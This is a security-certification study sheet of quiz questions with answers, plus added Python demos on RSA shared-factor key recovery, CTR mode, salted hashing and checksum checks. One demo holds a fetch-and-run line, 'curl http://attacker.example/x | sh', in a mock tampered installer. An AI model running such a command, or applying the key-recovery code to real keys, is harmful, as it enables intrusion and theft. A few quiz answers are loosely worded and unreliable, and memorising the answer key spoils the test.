Lesson 1-5
Which of the following depict ways a malicious attacker can gain access to a target's network?
A. Phishing B. Shoulder surfing
A user's PC is infected with a virus that appears to be memory resident and loads any time the machine is booted from an external universal serial bus (USB) thumb drive. Examine the following options and determine which describes the infection type.
Boot virus
Evaluate the differences between stream and block ciphers and select the true statement.
A block cipher is padded to the correct size if there is not enough data in the plaintext.
Analyze the following attacks to determine which best illustrates a pharming attack.
A customer enters the correct URL of their bank, which should resolve to the IP address 172.1.24.4. However, the browser goes to 168.254.1.1, a fake site designed to look exactly like the real bank site.
Select the statement which best describes the difference between a zero-day vulnerability and a legacy platform vulnerability.
A legacy platform vulnerability is typically unpatchable, while a zero-day vulnerability may be exploited before a developer can create a patch for it.
Which of the following statements summarizes a disadvantage to performing an active vulnerability scan?
A. Active scanning consumes more network bandwidth. B. Active scanning runs the risk of causing an outage.
Encryption vulnerabilities allow unauthorized access to protected data. Which component is subject to brute-force enumeration?
A weak cipher, whose key space is small enough for an attacker to enumerate by trying every possible key
Which statement best illustrates the importance of a strong true random number generator (TRNG) or pseudo-random number generator (PRNG) in a cryptographic implementation?
A weak number generator leads to many published keys sharing a common factor.
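The answer above refers to a real-world failure: when two RSA keys were generated from poor entropy and happen to share one prime, a single gcd of the two public moduli recovers that prime and, from it, both private keys. The block below is an added example, not part of the original lesson; it uses small constructed primes (labelled in the code) so the arithmetic is visible, and recovers the private exponent and decrypts a test ciphertext from the shared factor alone.

```python
from math import gcd

# Constructed demo keys: four known primes, chosen so that two moduli share P.
# Real keys are ~2048-bit; the arithmetic is identical, only the sizes differ.
P = 2147483647       # 2^31 - 1 (Mersenne prime)
Q = 999983           # largest prime below 10^6
R = 1000003
S = 65521            # largest prime below 2^16
T = 4294967291       # largest prime below 2^32
E = 65537            # common public exponent

# Keys 0 and 1 were "generated" with the same prime P (weak RNG); key 2 is unrelated.
MODULI = [P * Q, P * R, T * S]


def find_shared_factors(moduli):
    """Pairwise gcd over a list of RSA public moduli.

    Returns (i, j, g) for every pair whose gcd is not 1. A non-trivial gcd is
    a prime factor of both moduli, so both keys are fully broken. For millions
    of keys a product tree replaces this O(n^2) loop; the idea is the same.
    """
    hits = []
    for i in range(len(moduli)):
        for j in range(i + 1, len(moduli)):
            g = gcd(moduli[i], moduli[j])
            if g != 1:
                hits.append((i, j, g))
    return hits


def private_exponent(n, known_factor, e=E):
    """Recover d once one factor of n is known: n = p*q, d = e^-1 mod (p-1)(q-1)."""
    p = known_factor
    q, rem = divmod(n, p)
    if rem:
        raise ValueError("known_factor does not divide n")
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)      # modular inverse (Python 3.8+)


def decrypt(ciphertext, n, d):
    return pow(ciphertext, d, n)


if __name__ == "__main__":
    for i, j, g in find_shared_factors(MODULI):
        print(f"keys {i} and {j} share factor {g}")
        d = private_exponent(MODULI[i], g)
        c = pow(42, E, MODULI[i])           # "encrypt" 42 to key i
        print("recovered plaintext:", decrypt(c, MODULI[i], d))
```

The check costs one gcd per pair of public keys and needs no private material, which is why the published-key survey could be run against the whole internet's certificates; the same scan is a cheap sanity check on any batch of keys an organization issues from embedded devices.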
The IT department head returns from an industry conference feeling inspired by a presentation on the topic of cybersecurity frameworks. A meeting is scheduled with IT staff to brainstorm ideas for deploying security controls by category and function throughout the organization. Which of the following ideas are consistent with industry definitions?
A. Deploy a technical control to enforce network access policies. B. Schedule quarterly security awareness workshops as a preventive control to prevent social engineering attacks. C. Deploy agents to file servers to perform continuous backups to cloud storage as a corrective control to mitigate the impact of malware.
In which of these situations might a non-credentialed vulnerability scan be more advantageous than a credentialed scan?
A. External assessments of a network perimeter B. Web application scanning
Which of the following is the best example of an insider threat?
A. Former employee B. Contractor
An employee calls IT personnel and states that they received an email with a PDF document to review. After the PDF was opened, the system has not been performing correctly. An IT admin conducted a scan and found a virus. Determine the two classes of viruses the computer most likely has.
A. Macro B. Script
One aspect of threat modeling is to identify potential threat actors and the risks associated with each one. When assessing the risk that any one type of threat actor poses to an organization, what are the most critical factors to profile?
A. Motivation B. Intent
A contractor has been hired to conduct security reconnaissance on a company. The contractor browses the company's website to identify employees and then finds their Facebook pages. Posts found on Facebook indicate a favorite bar that employees frequently visit. The contractor visits the bar and learns details of the company's security infrastructure through small talk. What reconnaissance phase techniques does the contractor practice?
A. Open Source Intelligence (OSINT) B. Social engineering
A malicious party adds malware to a popular video game and offers free copies to users. The party's objective is to require the CD to be inserted during use. This software will gain administrative rights, change system files, and may hide from detection without the knowledge or consent of the user. Consider the malware characteristics and determine which may be used.
A. Rootkit B. Trojan
During a penetration test, an adversary operator sends an encrypted message embedded in an attached image. Analyze the scenario to determine what techniques the operator is relying on to hide the message.
A. Security by obscurity B. Confidentiality
A contractor has been hired to conduct penetration testing on a company's network. They have decided to try to crack the passwords on a percentage of systems within the company. They plan to annotate the type of data that is on the systems that they can successfully crack to prove the ease of access to data. Evaluate the penetration steps and determine which are being utilized for this task.
A. Test security controls B. Exploit vulnerabilities
An outside security consultant updates a company's network, including cloud data storage solutions. The consultant leaves the manufacturer's default settings when installing network switches, assuming the vendor shipped the switches in a default-secure configuration. Examine the company's network security posture and select the statements that describe key vulnerabilities in this network.
A. The network is open to third-party risks from using an outside contractor to configure cloud storage settings. B. The default settings in the network switches represent a weak configuration.
Following a data breach at a large retail company, their public relations team issues a statement emphasizing the company's commitment to consumer privacy. Identify the true statements concerning this event.
A. The privacy breach may allow the threat actor to sell the data to other malicious actors. B. The data breach can cause data to be exfiltrated.
Select the appropriate methods for packet capture.
A. Wireshark B. tcpdump
An IT manager in the aviation sector checks the industry's threat intelligence feed to keep up on the latest threats and ensure the work center implements the best practices in the field. What type of threat intelligence source is the IT manager most likely accessing?
An Information Sharing and Analysis Center (ISAC)
What is the trade-off when considering which type of encryption cipher to use?
Asymmetric encryption involves substantially more computing overhead than symmetric encryption. Asymmetric encryption is inefficient when encrypting a large amount of data on a disk or transporting it over a network.
Which statement most accurately describes the mechanisms by which blockchain ensures information integrity and availability?
Blockchain ensures availability through decentralization, and integrity through cryptographic hashing and timestamping.
A manufacturing company hires a pentesting firm to uncover any vulnerabilities in their network with the understanding that the pen tester receives no information about the company's system. Which of the following penetration testing strategies is the manufacturing company requesting?
Black box
Compare and contrast the modes of operation for block ciphers. Which of the following statements is true?
CTR (counter) mode allows block ciphers to behave like stream ciphers.
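The two cipher questions above (block ciphers need padding; CTR mode turns a block cipher into a stream cipher) are illustrated by the following added example, which is not code from the lesson. It implements PKCS#7 padding with strict unpadding checks, then CTR mode over a 16-byte block function. Because the standard library has no AES, an HMAC-SHA256 PRF truncated to one block stands in for AES_K(nonce || counter); that substitution and the 12-byte nonce / 32-bit counter layout are assumptions of this example. It also shows the classic CTR failure mode: reusing a nonce under the same key leaks the XOR of the two plaintexts.

```python
import hashlib
import hmac

BLOCK = 16  # AES block size in bytes


def pkcs7_pad(data: bytes, block: int = BLOCK) -> bytes:
    """Pad to a multiple of `block`. Always adds 1..block bytes, so an
    already-aligned message gets one whole extra block and unpadding is unambiguous."""
    n = block - (len(data) % block)
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes, block: int = BLOCK) -> bytes:
    if not data or len(data) % block:
        raise ValueError("length is not a block multiple")
    n = data[-1]
    if not 1 <= n <= block or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def _keystream_block(key: bytes, nonce: bytes, counter: int) -> bytes:
    # Stand-in for AES_K(nonce || counter): a keyed PRF truncated to one block.
    # A real implementation feeds the same 16-byte counter block to AES-ECB.
    ctr_block = nonce + counter.to_bytes(4, "big")   # 12-byte nonce + 32-bit counter
    return hmac.new(key, ctr_block, hashlib.sha256).digest()[:BLOCK]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """CTR mode: encrypt successive counter blocks and XOR them into the data.
    The same call encrypts and decrypts; the final block may be partial, so
    ciphertext length equals plaintext length and no padding is applied."""
    out = bytearray()
    for i in range(0, len(data), BLOCK):
        ks = _keystream_block(key, nonce, i // BLOCK)
        out += xor_bytes(data[i:i + BLOCK], ks)
    return bytes(out)


if __name__ == "__main__":
    key, nonce = b"k" * 32, b"n" * 12              # constructed demo key and nonce
    p1 = b"stream-like, no padding needed"        # 30 bytes: not a block multiple
    c1 = ctr_crypt(key, nonce, p1)
    print(len(p1), len(c1), ctr_crypt(key, nonce, c1) == p1)
    p2 = b"second message under same nonce"
    c2 = ctr_crypt(key, nonce, p2)                 # nonce reuse: same keystream
    print(xor_bytes(c1, c2) == xor_bytes(p1, p2))  # attacker learns p1 XOR p2
```

The padding functions show what "padded to the correct size" means in the block-cipher answer, including the full extra block for an aligned message; the CTR functions show why no padding is needed once the cipher is used as a keystream generator. The nonce-reuse check is the property to remember: a counter-mode nonce must never repeat under one key.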
A security team is in the process of selecting a cryptographic suite for their company. Analyze cryptographic implementations and determine which of the following performance factors is most critical to this selection process if users primarily access systems on mobile devices.
Computational overhead
The _____ requires federal agencies to develop security policies for computer systems that process confidential information.
Computer Security Act
What does the CIA Triad stand for?
Confidentiality Integrity Availability
A system administrator has just entered their credentials to enter a secure server room. As the administrator is entering the door, someone is walking up to the door with their hands full of equipment and appears to be struggling to move items around while searching for their credentials. The system administrator quickly begins to assist by getting items out of the person's hands, and they walk into the room together. This person is not an employee, but someone attempting to gain unauthorized access to the server room. What type of social engineering has occurred?
Consensus/social proof
After a poorly handled security breach, a company updates its security policy to include an improved incident response plan. Which of the following security controls does this update address?
Corrective
A system analyst is tasked with searching the dark web for harvested customer data. Because these sites cannot be readily found in standard website searches, what is often gained by "word of mouth" bulletin boards to assist in reaching the desired page?
Dark Website URL
Which of the following utilizes both symmetric and asymmetric encryption?
Digital envelope
An employee works on a small team that shares critical information about the company's network. When sending emails that have this information, what would be used to provide the identity of the sender and prove that the information has not been tampered with?
Digital signature
A client contacts a server for a data transfer. Instead of requesting TLS 1.3, the client claims that legacy systems require the use of SSL. What type of attack might a data transfer using this protocol facilitate?
Downgrade
Which statement describes the mechanism by which encryption algorithms help protect against birthday attacks?
Encryption algorithms add salt when computing password hashes.
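Two separate ideas sit behind the answer above, and the added example below (not part of the lesson) makes both concrete. The birthday bound is what governs how many hash outputs an attacker must generate before a collision becomes likely, and depends only on the hash's output size; salting is what stops precomputed tables and cross-account matching when passwords are hashed. The collision formulas are the standard approximations, and the password hashing uses PBKDF2-HMAC-SHA256 from the standard library with a per-password random salt; the storage string format is an assumption of this example.

```python
import hashlib
import hmac
import math
import os
from typing import Optional

ITERATIONS = 600_000   # PBKDF2-HMAC-SHA256 work factor (OWASP 2023 guidance)


def birthday_collision_probability(bits: int, samples: int) -> float:
    """P(at least one collision) among `samples` random outputs of a `bits`-bit hash.
    Uses 1 - exp(-k^2 / 2^(n+1)), accurate once k is large."""
    return 1.0 - math.exp(-(samples ** 2) / 2 ** (bits + 1))


def samples_for_probability(bits: int, p: float = 0.5) -> int:
    """Hashes needed for a collision with probability p: sqrt(2 ln(1/(1-p)) * 2^n).
    For p = 0.5 this is about 1.18 * 2^(n/2), the familiar 'half the bits' rule."""
    return math.ceil(math.sqrt(2 * math.log(1 / (1 - p)) * 2 ** bits))


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$<iters>$<salt hex>$<hash hex>' with a fresh 16-byte salt."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


if __name__ == "__main__":
    for bits in (64, 128, 256):
        print(f"{bits}-bit hash: ~2^{math.log2(samples_for_probability(bits)):.1f} hashes for a 50% collision")
    h1 = hash_password("correct horse")
    h2 = hash_password("correct horse")
    print("same password, different stored hashes:", h1 != h2)
    print("verify:", verify_password("correct horse", h1), verify_password("wrong", h1))
```

The first two functions explain why a 128-bit hash offers only about 64 bits of collision resistance; the last two show the salt being generated per password, stored alongside the hash, and reused at verification, so two users with the same password never share a stored value.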
A network administrator uses an automated vulnerability scanner. It regularly updates with the latest vulnerability feeds. If the system regularly performs active scans and returns the presence of vulnerabilities when they do not exist, what type of error is the system most likely making?
False positive
A hospital must balance the need to keep patient privacy information secure and the desire to analyze the contents of patient records for a scientific study. What cryptographic technology can best support the hospital's needs?
Homomorphic encryption
The National Institute of Standards and Technology (NIST) provides a framework that classifies security-related functions. Which description aligns with the "respond" function?
Identify, analyze, and eradicate threats.
Which statement best explains the differences between black box, white box, and gray box attack profiles used in penetration testing?
In a black box pen test, the contractor receives no privileged information, so they must perform reconnaissance. In contrast, a white box pen tester has complete access and skips reconnaissance. A gray box tester has some, but not all information, and requires partial reconnaissance.
Analyze and eliminate the item that is NOT an example of a reconnaissance technique.
Initial exploitation
How might the goals of basic network management not align with the goals of security?
Management focuses on availability over confidentiality.
A company has an annual contract with an outside firm to perform a security audit on their network. The purpose of the annual audit is to determine if the company is in compliance with their internal directives and policies for security control. Select the broad class of security control that accurately demonstrates the purpose of the audit.
Managerial
What control category are controls that give oversight of the system?
Managerial
Which security related phrase relates to the integrity of data?
Modification
Which of the following has a cyber security framework (CSF) that focuses exclusively on IT security, rather than IT service provisioning?
National Institute of Standards and Technology (NIST)
What does it mean when subjects cannot deny creating or modifying data?
Non-repudiation
An engineer looks to implement security measures by following the five functions in the National Institute of Standards and Technology (NIST) Cybersecurity Framework. When documenting the "detect" function, what does the engineer focus on?
Ongoing proactive monitoring
Examine each attack vector. Which is most vulnerable to escalation of privileges?
Operating System (OS)
What control category are controls that depend on a person for implementation?
Operational
When using a digital envelope to exchange key information, the use of what key agreement mitigates the risk inherent in the Rivest-Shamir-Adleman (RSA) algorithm, and by what means?
Perfect forward secrecy (PFS) uses Diffie-Hellman (DH) key agreement to create ephemeral session keys without using the server's private key.
A hacker sets up a C2 network to control a compromised host. What refers to the hacker's ability to reconnect to the compromised host and use it as a RAT or backdoor?
Persistence
Examine each statement and determine which most accurately describes a major limitation of quantum computing technology.
Presently, quantum computers do not have the capacity to run useful applications.
Which two cryptographic functions can be combined to authenticate a sender and prove the integrity of a message?
Public key cryptography and hashing
An individual receives a text message that appears to be a warning from a well-known order fulfillment company, informing them that the carrier has tried to deliver their package twice, and that if the individual does not contact them to claim it, the package will not be delivered. Analyze the scenario and select the social engineering technique being used.
SMiShing
Which of the following is NOT a use of cryptography?
Security through obscurity
An employee is having coffee at an outdoor coffee shop and is not taking precautions against someone watching their screen while working on a company project. A person a few tables over watches the employee enter their credentials and then takes photos of the work they are completing with their smartphone. Which form of social engineering is being used in this situation?
Shoulder surfing
A hacker is able to install a keylogger on a user's computer. What is the hacker attempting to do in this situation?
Steal confidential information
An attacker uses a cryptographic technology to create a covert message channel in transmission control protocol (TCP) packet data fields. What cryptographic technique does this attack strategy employ?
Steganography
Which statement best describes key differences between symmetric and asymmetric cryptographic ciphers?
Symmetric encryption is primarily used for encrypting large volumes of data and uses the same key for encryption and decryption.
Which control category covers controls implemented in operating systems, systems, and security appliances?
Technical
What are the security control categories?
Technical Operational Managerial
Any external responsibility for an organization's security lies mainly with which individuals?
The senior executives
During a penetration test, systems administrators for a large company are tasked to play on the white team for an affiliated company. Examine each of the following roles and determine which role the systems admins will fill.
The systems admins will arbitrate the exercise, setting rules of engagement and guidance.
A security technician needs to transfer a large file to another user in a data center. Which statement best illustrates what type of encryption the technician should use to perform the task?
The technician should use asymmetric encryption to verify the data center user's identity and agree on a symmetric encryption algorithm for the data transfer.
A security engineer is investigating a potential system breach. When compiling a report of the incident, how does the engineer classify the actor and the vector?
Threat
An IT director reads about a new form of malware that targets a system widely utilized in the company's network. The director wants to discover whether the network has been targeted, but also wants to conduct the scan without disrupting company operations or tipping off potential attackers to the investigation. Evaluate vulnerability scanning techniques and determine the best tool for the investigation.
Threat hunting
Which situation would require keyboard encryption software be installed on a computer?
To protect against spyware
A Department of Defense (DoD) security team identifies a data breach in progress, based on some anomalous log entries, and takes steps to remedy the breach and harden their systems. When they resolve the breach, they want to publish the cyber threat intelligence (CTI) securely, using a standardized language, for other government agencies to use. The team will transmit the threat data feed via which protocol?
Trusted Automated eXchange of Indicator Information (TAXII)
An unknowing user with authorized access to systems in a software development firm installs a seemingly harmless, yet unauthorized program on a workstation without the IT department's sanction. Identify the type of threat that is a result of this user's action.
Unintentional insider threat
What is Open Source Intelligence (OSINT)?
Using web search tools and social media to obtain information about the target
A system administrator downloads and installs software from a vendor website. Soon after installing the software, the administrator's computer is taken over remotely. After closer investigation, the software package was modified, probably while it was downloading. What action could have prevented this incident from occurring?
Validate the software using a checksum
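As an added example for the checksum answer (not code from the lesson), the block below parses a `sha256sum`-style manifest ("<64 hex digits>  <filename>", one per line) and verifies downloaded bytes against it with a constant-time comparison. The package contents and the manifest are constructed inline so it runs offline; the manifest is built from the good bytes the way a publisher would produce it, and a tampered copy is then rejected.

```python
import hashlib
import hmac


def parse_sha256sums(manifest: str) -> dict:
    """Parse sha256sum output into {filename: hex digest}.

    Accepts the text-mode ('hash  name') and binary-mode ('hash *name') forms,
    skips blank and '#' lines, and rejects anything that is not a 64-hex entry.
    """
    entries = {}
    for lineno, line in enumerate(manifest.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(maxsplit=1)
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError(f"line {lineno}: not a sha256sum entry")
        digest, name = parts
        try:
            bytes.fromhex(digest)
        except ValueError:
            raise ValueError(f"line {lineno}: digest is not hex") from None
        entries[name.lstrip("*")] = digest.lower()
    return entries


def verify_download(data: bytes, name: str, manifest: str) -> bool:
    """True only if sha256(data) matches the manifest entry for `name`.
    Raises KeyError when the file is not listed, so an unlisted file is never
    silently treated as verified."""
    expected = parse_sha256sums(manifest)[name]
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected)


# Constructed sample: what the vendor published, and what arrived.
GOOD = b"#!/bin/sh\necho 'installing vendor agent'\n"
MANIFEST = (
    "# SHA256SUMS for release 1.0 (constructed for this example)\n"
    f"{hashlib.sha256(GOOD).hexdigest()}  installer.sh\n"
)
TAMPERED = GOOD + b"curl http://attacker.example/x | sh\n"   # modified in transit

if __name__ == "__main__":
    print("vendor copy  :", verify_download(GOOD, "installer.sh", MANIFEST))
    print("tampered copy:", verify_download(TAMPERED, "installer.sh", MANIFEST))
```

The check only helps if the manifest is obtained over a path the attacker could not also modify (a separate TLS-protected site, or a manifest signed with the vendor's published key); a checksum fetched from the same compromised mirror can be rewritten alongside the package.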
A company technician goes on vacation. While the technician is away, a critical patch released for Windows servers is not applied. According to the National Institute of Standards and Technology (NIST), what does the delay in applying the patch create on the server?
Vulnerability
Compare and contrast vulnerability scanning and penetration testing. Select the true statement from the following options.
Vulnerability scanning by eavesdropping is passive, while penetration testing with credentials is active.
A system administrator must scan the company's web-based application to identify which ports are open and which operating system can be seen from the outside world. Determine the syntax that should be used to yield the desired information if the administrator will be executing this task from a Linux command line.
nmap -O <target> (OS fingerprinting is added to Nmap's default port scan; it requires root or raw-socket privileges)
A network manager needs a map of the network's topology. The network manager is using Network Mapper (Nmap) and will obtain the visual map with the Zenmap tool. If the target IP address is 192.168.1.1, determine the command within Nmap that will return the necessary data to build the visual map of the network topology.
nmap -sn --traceroute 192.168.1.1
Identify the command that can be used to detect the presence of a host on a particular IP address.
ping